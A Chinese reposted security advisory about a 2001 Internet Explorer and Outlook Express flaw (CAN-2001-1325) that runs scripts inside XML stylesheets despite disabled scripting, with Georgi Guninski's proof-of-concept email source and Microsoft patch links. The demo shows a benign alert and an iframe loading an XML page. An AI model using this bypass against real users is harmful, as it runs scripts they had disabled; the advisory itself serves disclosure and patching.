微软IE和OE执行XML样式表中的活动脚本的漏洞
2008-04-09 04:34:47来源:互联网 阅读 ()
发布日期:2001-04-29
更新日期:2001-04-29
受影响系统:
描述:
Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Outlook Express 5.5
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0.1 for Windows 98
- Microsoft Windows 98
Microsoft Internet Explorer 5.0.1 for Windows 95
- Microsoft Windows 95
Microsoft Internet Explorer 5.0.1 for Windows 2000
- Microsoft Windows 2000
Microsoft Internet Explorer 5.01
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Outlook Express 5.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
BUGTRAQ ID: 2633
CVE(CAN) ID: CAN-2001-1325
Internet Explorer和Outlook Express在处理XML样式表时存在一个漏洞。尽管所有安全区域中的活动脚本都被禁止,但是IE和OE仍然允许执行包含在XML页面的样式表中的脚本。
<* 来源:Georgi Guninski (guninski@guninski.com)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@guninski.com) 给出如下演示页面:
http://www.guninski.com/xstyle.eml
其源码如下:
From: "georgi"
Subject: xstyle
Date:
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000"
X-Priority: 3
X-MSMail-Priority: Normal
This is a multi-part message in MIME format.
------=_NextPart_000
Content-Type: text/html;
charset="iso-8859-1"
test
<H1>
XStyle demo. Written by Georgi Guninski
</H1>
<SCRIPT>
alert("JS should not be working");
</SCRIPT>
<IFRAME SRC="http://www.guninski.com/xstyle.xml"></IFRAME>
------=_NextPart_000--
建议:
厂商补丁:
微软早先提供的用于Windows Script Host的补丁也可以用于本漏洞:
Microsoft Internet Explorer 5.5:
Microsoft patch ste51en
http://www.microsoft.com/scripting/downloads/v51/other/ste51en.exe
Windows 95, 98, NT 4.0
Microsoft patch scripten
http://www.microsoft.com/scripting/downloads/v51/windows2000/scripten.exe
Windows 2000
Microsoft patch scr55en
http://www.microsoft.com/scripting/downloads/v55/other/scr55en.exe
Microsoft Internet Explorer 5.0:
Microsoft patch ste51en
http://www.microsoft.com/scripting/downloads/v51/other/ste51en.exe
Windows 95, 98, NT 4.0
Microsoft patch scripten
http://www.microsoft.com/scripting/downloads/v51/windows2000/scripten.exe
Windows 2000
Microsoft patch scr55en
http://www.microsoft.com/scripting/downloads/v55/other/scr55en.exe
Microsoft Outlook Express 5.5:
Microsoft patch scr55en
http://www.microsoft.com/scripting/downloads/v55/other/scr55en.exe
Windows 95, 98, NT 4.0
Microsoft patch scripten
http://www.microsoft.com/scripting/downloads/v51/windows2000/scripten.exe
Windows 2000
Microsoft patch ste51en
http://www.microsoft.com/scripting/downloads/v51/other/ste51en.exe
Microsoft Outlook Express 5.0:
Microsoft patch ste51en
http://www.microsoft.com/scripting/downloads/v51/other/ste51en.exe
Windows 95, 98, NT 4.0
Microsoft patch scripten
http://www.microsoft.com/scripting/downloads/v51/windows2000/scripten.exe
Windows 2000
Microsoft patch scr55en
http://www.microsoft.com/scripting/downloads/v55/other/scr55en.exe
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
